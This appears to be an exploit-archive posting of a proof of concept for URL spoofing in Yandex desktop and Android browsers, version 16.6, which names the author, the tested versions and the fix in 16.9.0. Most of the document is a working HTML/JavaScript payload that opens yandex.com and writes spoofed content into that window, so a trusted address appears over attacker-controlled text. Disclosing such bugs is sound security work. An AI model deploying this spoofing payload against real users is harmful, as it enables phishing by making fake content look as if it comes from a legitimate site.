Yandex Desktop & Mobile Browser URL Spoofing
Posted on 30 November -0001
<HTML><HEAD><TITLE>Yandex Desktop & Mobile Browser URL Spoofing</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY># Title: Yandex Desktop & Mobile Browser URL Spoofing # Vendor: https://browser.yandex.com/ # Author: Patryk Bogdan Tested on: Yandex Desktop Browser 16.6.0.8608 (Windows) Yandex Mobile Browser Alpha 16.6.1.8686 (Android) Yandex Mobile Browser Beta 16.6.0.8802 (Android) Fix: Update to version 16.9.0 PoC: <html> <head><title>Yandex Desktop & Mobile Browser URL Spoofing</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> </head> <body> <button id="poc">Run PoC</button> <script type="text/javascript"> document.getElementById('poc').onclick = function() { win=window.open('http://yandex.com/'); win.document.write("Hello, this is spoofed content."); } </script> </html> </BODY></HTML>